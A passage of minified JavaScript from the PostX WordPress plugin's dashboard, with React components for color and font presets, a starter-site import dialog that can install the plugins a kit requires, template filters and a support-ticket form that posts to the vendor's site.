dashicons-image-rotate",onClick:()=>{u(""),v(s)}})),(0,a.createElement)("ul",{className:"ultp-color-group"},h.map(((e,t)=>(0,a.createElement)("li",{className:"ultp_starter_preset_list "+(d==t+1?"active":""),key:t,onClick:()=>{const n={};u(t+1),g.forEach(((t,a)=>{n[t]=e[a]})),v(n)}},e.map(((e,t)=>![1,2,6,8,9].includes(t+1)&&(0,a.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:e}}))))))))}},5066:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(448);const{__}=wp.i18n,o=({ultpPresetTypos:e,currentPresetTypos:t,setCurrentPresetTypos:n})=>{const o={...e,presetTypoCSS:(0,r.AJ)("typoCSS",e,!0)},[i,l]=(0,a.useState)({...t,...o}),[s,p]=(0,a.useState)(""),c=(0,r.AJ)("presetTypoKeys"),d=(0,r.AJ)("typoStacks");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetTypos","",(e=>{if(e.data){const t={...e.data,...i};l({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)}),n({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)})}}))}),[]);const u=e=>{const a={...t,...e},o=((e={})=>{const t=(0,r.AJ)("typoCSS",e,!0),n=document.querySelector("#ultp-starter-preview");if(n.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};n.contentWindow.postMessage(e,"*")}return t})(a);l(a),n({...a,presetTypoCSS:o})};return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Font & Typography","ultimate-post")),s&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{p(""),u(o)}})),(0,a.createElement)("ul",{className:"ultp-typo-group"},d.map(((e,n)=>(0,a.createElement)("li",{title:`${e[0].family}/${e[1].family}`,className:"ultp_starter_preset_typo_list "+(s==n+1?"active":""),key:n,onClick:()=>{const a={};p(n+1),c.forEach(((n,r)=>{a[n]={...t[n]},a[n].family=e[r].family,a[n].type=e[r].type,a[n].weight=e[r].weight})),u(a)}},e.map(((e,t)=>(0,a.createElement)("span",{key:t},(0,a.createElement)("style",null,(0,r.AJ)("font_load",e,!0)),(0,a.createElement)("span",{key:t,className:"",style:{fontFamily:`${e.family}, ${e.type}`}},0==t?"A":"a")))))))))}},5324:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(4766);const o=e=>{const{useState:t,useEffect:n,useRef:o,onChange:i,options:l,value:s,contentWH:p}=e,[c,d]=t(!1),u=o(null),m=e=>{u?.current&&!u?.current.contains(e.target)?d(!1):u?.current&&u?.current.contains(e.target)&&!e.target.classList?.contains("ultp-reserve-button")&&d(!u?.current.classList?.contains("open"))};n((()=>(document.addEventListener("mousedown",m),()=>document.removeEventListener("mousedown",m))),[]);const f=l?.find((e=>e.value===s));return(0,a.createElement)("div",{ref:u,className:"starter_filter_select "+(c?"open":"")},(0,a.createElement)("div",{className:"starter_filter_selected"},f?f.label:"Select an option",r.ZP.collapse_bottom_line),c&&(0,a.createElement)("ul",{className:"starter_filter_select_options",style:{minWidth:p?.width||"100px",maxHeight:p?.height||"160px"}},l.map(((e,t)=>(0,a.createElement)("li",{className:"ultp-reserve-button starter_filter_select_option",key:t,onClick:()=>(e=>{d(!1),i(e.value)})(e)},e.label)))))}},814:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var a=n(7294),r=n(448),o=n(4766),i=n(4482),l=n(8949),s=n(4371),p=n(5066);n(4602);const{__}=wp.i18n,c=e=>{const{_val:t,setLiveUrl:n,liveUrl:c}=e,[d,u]=(0,a.useState)({}),[m,f]=(0,a.useState)({}),[h,g]=(0,a.useState)({}),v={deletePrevious:"yes",installPlugin:"yes",user_email:ultp_dashboard_pannel.user_email,get_newsletter:"yes",importDummy:"yes"},[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(!1),[y,k]=(0,a.useState)(!1),[E,C]=(0,a.useState)([]),[S,M]=(0,a.useState)(v),[L,N]=(0,a.useState)(0),[Z,P]=(0,a.useState)({type:"desktop",width:"100%"}),[z,A]=(0,a.useState)(!1),[B,H]=(0,a.useState)(!0),[T,R]=(0,a.useState)(!1),[O,j]=(0,a.useState)({plugin:!1,content:!1}),[V,F]=(0,a.useState)(!1),[W,D]=(0,a.useState)({}),[I,U]=(0,a.useState)({}),[$,G]=(0,a.useState)([]);(0,a.useEffect)((()=>{window.fetch("https://postxkit.wpxpo.com/"+t.live+"/wp-json/importer/global_settings",{method:"GET"}).then((e=>e.text())).then((e=>{const t=(0,r.cC)(e,{});t.success&&(((e={})=>{wp.apiFetch({path:"/ultp/v1/action_option",method:"POST",data:{type:"get"}}).then((t=>{if(t.success){let n={...t.data,...e};n={...n,globalCSS:(0,r.AJ)("globalCSS",n)},g(n)}}))})(t.postx_global),D(t.ultpPresetColors),U(t.ultpPresetTypos),G(t.plugins))})).catch((e=>{}))}),[]);const q=(e,t,n,r="")=>(0,a.createElement)("div",{className:"input_container"},"checkbox"==t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultChecked:!(!S[e]||"yes"!=S[e]),onChange:t=>{const n=t.target.checked?"yes":"no";M({...S,[e]:n})}}),"checkbox"!=t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultValue:S[e]||"",onChange:t=>{const n=t.target.value;M({...S,[e]:n})}}),n&&(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},n)));return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:" ultp_starter_packs_demo theme-install-overlay wp-full-overlay expanded "+(B?"active":"inactive"),style:{display:"block"}},(0,a.createElement)("div",{className:"wp-full-overlay-sidebar "},(0,a.createElement)("div",{className:"wp-full-overlay-header"},(0,a.createElement)("div",{className:"ultp_starter_packs_demo_header"},(0,a.createElement)("div",{className:"packs_title"},t.title,(0,a.createElement)("span",null,t.category)),(0,a.createElement)("button",{onClick:()=>n(""),className:"close-full-overlay"})),(0,a.createElement)("div",{className:"ultp-starter-collapse "+(B?"active":"inactive"),onClick:()=>{H(!B)}},o.ZP.collapse_bottom_line)),Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}})))))),(0,a.createElement)("div",{className:"wp-full-overlay-sidebar-content"},W.hasOwnProperty("Base_1_color")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(s.Z,{ultpPresetColors:W,currentPresetColors:d,setCurrentPresetColors:u,currentPostxGlobal:h,setCurrentPostxGlobal:g})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:40,unit2:"px",br:40}}),(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}})))))),I.hasOwnProperty("Body_and_Others_typo")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(p.Z,{ultpPresetTypos:I,currentPresetTypos:m,setCurrentPresetTypos:f})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}}))))))),(0,a.createElement)("div",{className:"wp-full-overlay-footer"},(0,a.createElement)("div",{className:"ultp_starter_import_options"},(0,a.createElement)("div",{className:"option_buttons"},t.pro&&!ultp_dashboard_pannel.active?(0,i.hx)(`https://www.wpxpo.com/postx/?utm_source=db-postx-starter&utm_medium=${t.live}-upgrade-pro&utm_campaign=postx-dashboard#pricing`,""):(0,a.createElement)("a",{className:"ultp-starter-button",onClick:()=>{w(!0)}},__("Import Site","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-starter-packs-device-container"},(0,a.createElement)("span",{onClick:()=>P({type:"desktop",width:"100%"}),className:"ultp-starter-packs-device "+("desktop"==Z.type?"d-active":"")},o.ZP.desktop),(0,a.createElement)("span",{onClick:()=>P({type:"tablet",width:(h.breakpointSm||"990")+"px"}),className:"ultp-starter-packs-device "+("tablet"==Z.type?"d-active":"")},o.ZP.tablet),(0,a.createElement)("span",{onClick:()=>P({type:"mobile",width:(h.breakpointXs||"767")+"px"}),className:"ultp-starter-packs-device "+("mobile"==Z.type?"d-active":"")},o.ZP.mobile))))),(0,a.createElement)("div",{className:"wp-full-overlay-main"},!T&&(0,a.createElement)("div",{className:"iframe_loader"},(0,a.createElement)("div",{className:"iframe_container"},(0,a.createElement)("div",{className:"iframe_header"},(0,a.createElement)("div",{className:"iframe_header_top"},(0,a.createElement)("div",{className:"header_top_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:60,unit2:"px",br:60}})),(0,a.createElement)("div",{className:"header_top_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),Array(3).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:30,unit1:"px",size2:30,unit2:"px",br:30}})))))),(0,a.createElement)("div",{className:"iframe_body_content"},(0,a.createElement)("div",{className:"iframe_body_slider"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:36,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"iframe_body"},(0,a.createElement)("div",{className:"iframe_body_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"iframe_body_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}})))))),(0,a.createElement)("iframe",{className:`${Z.type}View`,onLoad:()=>{R(!0),(()=>{const e=document.querySelector("#ultp-starter-preview");if(d.hasOwnProperty("Base_1_color")){const t=(0,r.AJ)("styleCss",d);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:t,dlMode:h.enableDark?"ultpDark":"ultpLight"};e.contentWindow.postMessage(n,"*")}}if(m.hasOwnProperty("Body_and_Others_typo")){const t=(0,r.AJ)("typoCSS",m,!0);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};e.contentWindow.postMessage(n,"*")}}})()},style:{display:"block",margin:"0 auto",maxWidth:Z.width},id:"ultp-starter-preview",src:"https://postxkit.wpxpo.com/"+c}))),_&&(0,a.createElement)("div",{className:"ultp-stater-container-settings-overlay"},(0,a.createElement)("div",{className:"ultp-stater-settings-container"},(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-popup-stater"},b?(0,a.createElement)(a.Fragment,null,y?(0,a.createElement)("div",{className:"ultp_processing_import"},(0,a.createElement)("div",{className:"stater_title"},__(`Started building ${t.title} website`,"ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp_import_builders ultp-info"},__("The import process can take a few seconds depending on the size of the kit you are importing and speed of the connection.","ultimate-post")," ",(0,a.createElement)("br",null),(O.plugin||O.content)&&(0,a.createElement)("div",{className:"progress"},(0,a.createElement)("div",null,(0,a.createElement)("strong",null,"Progress:")," ",O.plugin?"Plugin Installation is":O.content?"Page/Posts/Media Importing is":"Site Importing"," ","on progress..")))),(0,a.createElement)("div",{className:"ultp_processing_show"},(0,a.createElement)("div",{className:"ultp-importer-loader"},(0,a.createElement)("div",{id:"ultp-importer-loader-bar",style:{width:L+"%"}}),(0,a.createElement)("div",{id:"ultp-importer-loader-percentage",style:{color:L>52?"#fff":"#000"}},L+"%"))),(0,a.createElement)("div",{className:"ultp_import_notice"},(0,a.createElement)("span",null,__("Note:","ultimate-post")),__("Please do not close this browser window until import is completed.","ultimate-post"))):(0,a.createElement)("div",{className:"ultp_successful_import"},(0,a.createElement)("div",{className:"stater_title"},t.title,__(` Imported ${V?"Failed":"Successfully"} `,"ultimate-post")),(0,a.createElement)("div",null,V?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Due to resquest timeout this import is failed","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.reload()}},__("Refresh","ultimate-post")),__("page and try again","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Navigate to","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.href=ultp_dashboard_pannel.builder_url,window.location.reload()}},__("Site Builder to edit","ultimate-post")),__("your Archive, Post, Default Page and other templates.","ultimate-post")),(0,a.createElement)("a",{className:"ultp-primary-button",href:ultp_dashboard_pannel.home_url},__("View Your Website","ultimate-post")))))):(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-info ultp-info-desc"}," ",__("Import the entire site including posts, images, pages, content and plugins.","ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Import Settings","ultimate-post")),q("importDummy","checkbox",__("Import dummy post, taxonomy and featured images","ultimate-post")),q("deletePrevious","checkbox",__("Delete Previously imported sites","ultimate-post")),q("installPlugin","checkbox",__("Install required plugins","ultimate-post"))),(0,a.createElement)("div",{className:"starter_page_impports"},(0,a.createElement)("div",{className:"stater_title"},__("Template/Pages","ultimate-post")),t?.templates?.map(((e,t)=>(!z&&t<3||z)&&(0,a.createElement)("div",{key:t,className:"input_container"},(0,a.createElement)("input",{type:"checkbox",defaultChecked:!E.includes(e.name),onChange:t=>{t.target.checked&&E.includes(e.name)?C(E.filter((t=>t!==e.name))):t.target.checked||E.includes(e.name)||C([...E,e.name])}}),(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},e.name))))),t.templates.length>3&&(0,a.createElement)("div",{className:"cursor",onClick:()=>{A(!z)}},"Show "+(z?"less":"more")," ",o.ZP.videoplay)),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Subscribe","ultimate-post")),(0,a.createElement)("span",null,__("Stay up to date with the latest started templates and special offers","ultimate-post")),q("user_email","email","","email_box"),q("get_newsletter","checkbox",__("Stay updated with exciting features and news."),"get_newsletter")))),!b&&(0,a.createElement)("div",{className:"starter_import "},(0,a.createElement)("a",{className:"ultp-primary-button",onClick:()=>(async e=>{x(!0);let n,a=0;async function o(e,t,r){n=setInterval((()=>{e>=t?clearInterval(n):(e++,a++,N(e))}),r)}if(o(a,70,"yes"==S.importDummy?800:400),e){x(!0),k(!0);const i=$;if((0,r.x2)("set","ultpPresetColors",d),(0,r.x2)("set","ultpPresetTypos",m),wp.apiFetch({method:"POST",path:"/ultp/v1/action_option",data:{type:"set",data:h}}),"yes"==S.deletePrevious||"yes"==S.get_newsletter){const e=new Promise(((e,t)=>{wp.apiFetch({path:"/ultp/v3/deletepost_getnewsletters",method:"POST",data:{deletePrevious:S.deletePrevious,get_newsletter:S.get_newsletter}}).then((t=>{e("responsed")}))}));await e}if("yes"==S.importDummy){const t=new Promise(((t,n)=>{wp.apiFetch({path:"/ultp/v3/starter_dummy_post",method:"POST",data:{api_endpoint:e,importDummy:S.importDummy}}).then((e=>{t("responsed")})).catch((e=>{console.log(e),t("responsed")}))}));await t}if("yes"==S?.installPlugin){j({...O,plugin:!0});const e=i.map(((e,t)=>new Promise(((t,n)=>{jQuery.ajax({type:"POST",url:ultp_dashboard_pannel.ajax,data:{action:"install_required_plugin",wpnonce:ultp_dashboard_pannel.security,plugin:JSON.stringify(e)}}).done((function(e){t("responsed")}))}))));await Promise.all(e),j({...O,plugin:!1})}clearInterval(n),o(a+1,80,500);const l=t.templates?.filter((e=>!E.includes(e.name)));l.length>0&&(j({...O,content:!0}),wp.apiFetch({path:"/ultp/v3/starter_import_content",method:"POST",data:{excludepages:JSON.stringify(E),api_endpoint:e,importDummy:S.importDummy,installPlugin:S?.installPlugin}}).then((e=>{clearInterval(n),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2)),e.success||F(!0)})).catch((e=>{console.log(e),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2))})))}})("https://postxkit.wpxpo.com/"+t.live)},__("Start Importing","ultimate-post"))),(0,a.createElement)("button",{onClick:()=>{y||(M(v),x(!1),N(0),k(!1),w(!1))},className:"ultp-popup-close "+(y?"s_loading":"")},o.ZP.close_line)))))}},6488:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(4766),o=n(2402),i=n(7763),l=n(5324);const{__}=wp.i18n,s=e=>{const{changeStates:t,column:n,showWishList:s,_fetchFile:p,fetching:c,searchQuery:d,fields:u,fieldValue:m,fieldOptions:f,useState:h,useEffect:g,useRef:v}=e;return(0,a.createElement)("div",{className:"ultp-templatekit-layout-search-container"},(0,a.createElement)("div",{className:"ultp-templatekit-search-container"},u?.filter&&(0,a.createElement)(a.Fragment,null," ",(0,a.createElement)("span",null,__("Filter:","ultimate-post")),(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.filter,contentWH:{height:"190px",width:"150px"},onChange:e=>{t("filter",e)},options:f?.filterArr||[]})),u?.trend&&m?.trend&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.trend,onChange:e=>{t("trend",e)},options:[{value:"all",label:__("Popular / Latest","ultimate-post")},{value:"popular",label:__("Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}),u?.freePro&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.freePro,onChange:e=>{t("freePro",e)},options:[{value:"all",label:__("Free / Pro","ultimate-post")},{value:"free",label:__("Free","ultimate-post")},{value:"pro",label:__("Pro","ultimate-post")}]})),(0,a.createElement)("div",{className:"ultp-templatekit-layout-container"},(0,a.createElement)(o.Z,{changeStates:t,searchQuery:d}),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("2"==n?"ultp-lay-active":""),onClick:()=>t("column","2")},i.Z.grid_col1),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("3"==n?"ultp-lay-active":""),onClick:()=>t("column","3")},i.Z.grid_col2),(0,a.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,a.createElement)("span",{className:"ultp-premade-wishlist cursor "+(s?"ultp-wishlist-active":""),onClick:()=>{t("wishlist",!s)}},r.ZP[s?"love_solid":"love_line"])),p&&(0,a.createElement)("div",{onClick:()=>p(),className:"ultp-filter-sync"},(0,a.createElement)("span",{className:"dashicons dashicons-update-alt "+(c?" rotate":"")}),__("Synchronize","ultimate-post"))))}},58:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);n(3358);const{__}=wp.i18n,r=()=>(0,a.createElement)("input",{type:"file",name:"attachment",accept:"image/png, image/jpeg",className:"xpo-input-support",id:"xpo-support-file-input"}),o=()=>{const[e,t]=(0,a.useState)(!1),[n,o]=(0,a.useState)(!1),[i,l]=(0,a.useState)(!1),s=(0,a.useRef)(null),p=(0,a.useRef)(null);return(0,a.useEffect)((()=>{!e&&i&&l(!1)}),[e,i]),(0,a.useEffect)((()=>{const n=new AbortController;if(e)return document.addEventListener("mousedown",(e=>{s.current&&!s.current.contains(e.target)&&(t(!1),l(!1))}),{signal:n.signal}),()=>{n.abort()}}),[e]),(0,a.createElement)("div",{ref:s},(0,a.createElement)("span",{className:"xpo-support-pops-btn xpo-support-pops-btn--small "+(e?"xpo-support-pops-btn--big":""),onClick:()=>t((e=>!e)),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&t((e=>!e))}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"28",height:"28",fill:"none",viewBox:"0 0 28 28"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",fillRule:"evenodd",d:"M27.3 14c0 7.4-6 13.3-13.3 13.3H.7l3.9-3.9A13.3 13.3 0 0 1 14 .7c7.4 0 13.3 6 13.3 13.3Zm-19 1.7a1.7 1.7 0 1 0 0-3.4 1.7 1.7 0 0 0 0 3.4Zm7.4-1.7a1.7 1.7 0 1 1-3.4 0 1.7 1.7 0 0 1 3.4 0Zm5.6 0a1.7 1.7 0 1 1-3.3 0 1.7 1.7 0 0 1 3.3 0Z",clipRule:"evenodd"}))),e&&(0,a.createElement)("div",{className:`xpo-support-pops-container ${e?"xpo-support-entry-anim":""} ${i?"":"xpo-support-pops-container--full-height"}`},(0,a.createElement)("div",{className:"xpo-support-pops-header"},(0,a.createElement)("div",{style:{maxHeight:i?"0px":"140px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("div",{className:"xpo-support-header-bg"}),(0,a.createElement)("div",{className:"xpo-support-pops-avatars"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/1.png",alt:"WPXPO"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/2.jpg",alt:"A. Owadud Bhuiyan"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/3.jpg",alt:"Abdullah Al Mahmud"}),(0,a.createElement)("div",{className:"xpo-support-signal-green xpo-support-signal"})),(0,a.createElement)("div",{className:"xpo-support-pops-text"},"Questions? Create an Issue!"))),(0,a.createElement)("div",{className:"xpo-support-chat-body"},(0,a.createElement)("div",{style:{maxHeight:i?"174px":"0px",opacity:i?"1":"0",transition:"max-height 0.3s, opacity 0.3s"}},i&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"xpo-support-thankyou-icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"xpo-support-animation"},(0,a.createElement)("circle",{className:"xpo-support-circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"xpo-support-check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("div",{className:"xpo-support-thankyou-title"},__("Thank You!","ultimate-post")),(0,a.createElement)("div",{className:"xpo-support-thankyou-subtitle"},__("Your message has been received. We will contact you soon on your email with a response. Stay connected and check mail!","ultimate-post")))),(0,a.createElement)("form",{ref:p,onSubmit:e=>{if(n)return;e.preventDefault(),o(!0);const t=new FormData(e.target);fetch("https://wpxpo.com/wp-json/v2/support_mail",{method:"POST",body:t}).then((e=>{if(!e.ok)throw new Error("Failed to submit ticket");l(!0),p.current&&p.current.reset()})).catch((e=>{console.log(e)})).finally((()=>{o(!1)}))},encType:"multipart/form-data",style:{maxHeight:i?"0px":"376px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("input",{type:"hidden",name:"user_name",defaultValue:ultp_dashboard_pannel.userInfo.name}),(0,a.createElement)("input",{type:"email",name:"user_email",className:"xpo-input-support",defaultValue:ultp_dashboard_pannel.userInfo.email,required:!0}),(0,a.createElement)("input",{type:"hidden",name:"subject",value:"Support from PostX"}),(0,a.createElement)("div",{className:"xpo-support-title"},__("Message","ultimate-post")),(0,a.createElement)("textarea",{name:"desc",className:"xpo-input-support",placeholder:"Write your message here..."}),(0,a.createElement)(r,null),(0,a.createElement)("button",{type:"submit",className:"xpo-send-button",disabled:n},n?(0,a.createElement)(a.Fragment,null,"Sending",(0,a.createElement)("div",{className:"xpo-support-loading"})):(0,a.createElement)(a.Fragment,null,"Send",(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"21",height:"20",fill:"none",viewBox:"0 0 21 20"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",d:"M18.4 10c0-.6-.3-1.1-.8-1.4L5 2c-.6-.3-1.2-.3-1.7 0-.6.4-.9 1.3-.7 1.9l1.2 4.8c0 .5.5.8 1 .8h7c.3 0 .6.3.6.6 0 .4-.3.6-.6.6h-7c-.5 0-1 .4-1 .9l-1.3 4.8c-.1.6 0 1.1.5 1.5l.1.2c.5.4 1.2.4 1.8.1l12.5-6.6c.6-.3 1-.9 1-1.5Z"}))))))))}},1389:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(6509);const r=e=>{const{title:t,modalContent:n,setModalContent:r}=e;return(0,a.createElement)("div",{className:"ultp-dashboard-modal-wrapper",onClick:e=>{e.target?.closest(".ultp-dashboard-modal")||r("")}},(0,a.createElement)("div",{className:"ultp-dashboard-modal"},(0,a.createElement)("div",{className:"ultp-modal-header"},t&&(0,a.createElement)("span",{className:"ultp-modal-title"},t),(0,a.createElement)("a",{className:"ultp-popup-close",onClick:()=>r("")})),(0,a.createElement)("div",{className:"ultp-modal-body"},n)))}},8949:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(619);const r=e=>{const{type:t,size:n,loop:r,unit:o,c_s:i,classes:l}=e,s=()=>{let e={};switch(t){case"image":case"circle":e={width:n?n+"px":"300px",height:n?n+"px":"300px"};break;case"title":e={width:`${n||"100"}${o||"%"}`};break;case"button":e={width:n?n+"px":"90px"};break;case"custom_size":e={width:`${i.size1?i.size1:"100"}${i.unit1?i.unit1:"%"}`,height:`${i.size2?i.size2:"20"}${i.unit2?i.unit2:"px"}`,borderRadius:i.br?i.br+"px":"0px"}}return e};return(0,a.createElement)(a.Fragment,null,r?(0,a.createElement)(a.Fragment,null,Array(parseInt(r)).fill("1").map(((e,n)=>(0,a.createElement)("div",{key:n,className:`ultp_skeleton__${t} ultp_frequency loop ${l||""}`,style:s()})))):(0,a.createElement)("div",{className:`ultp_skeleton__${t} ultp_frequency ${l||""}`,style:s()}))}},356:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2413);const{__}=wp.i18n,r=({delay:e,toastMessages:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!0),[i,l]=(0,a.useState)("show");return(0,a.useEffect)((()=>{const t=setTimeout((()=>{o(!1),l(""),n({state:!1,status:""})}),e);return()=>clearTimeout(t)}),[e]),(0,a.createElement)("div",{className:"toast"},r&&t.status&&t.messages.length>0&&(0,a.createElement)("div",{className:"toastMessages"},t.messages.map(((e,r)=>(0,a.createElement)("span",{key:`toast_${Date.now().toString()}_${r}`},(0,a.createElement)("div",{className:`toaster ${i}`},(0,a.createElement)("span",null,"error"==t.status?(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{cx:"26",cy:"26",r:"25",fill:"none",className:"circle cross"}),(0,a.createElement)("path",{fill:"none",d:"M 12,12 L 40,40 M 40,12 L 12,40",className:"check"})):(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{className:"circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("span",{className:"itmCenter"},e),(0,a.createElement)("span",{className:"itmLast",onClick:()=>(e=>{let a=[...t.messages];a=a.filter(((t,n)=>n!==e)),n({...t,messages:a})})(r)},__("Close","ultimate-post"))))))))}},448:(e,t,n)=>{"use strict";n.d(t,{AJ:()=>o,cC:()=>l,x2:()=>r});var 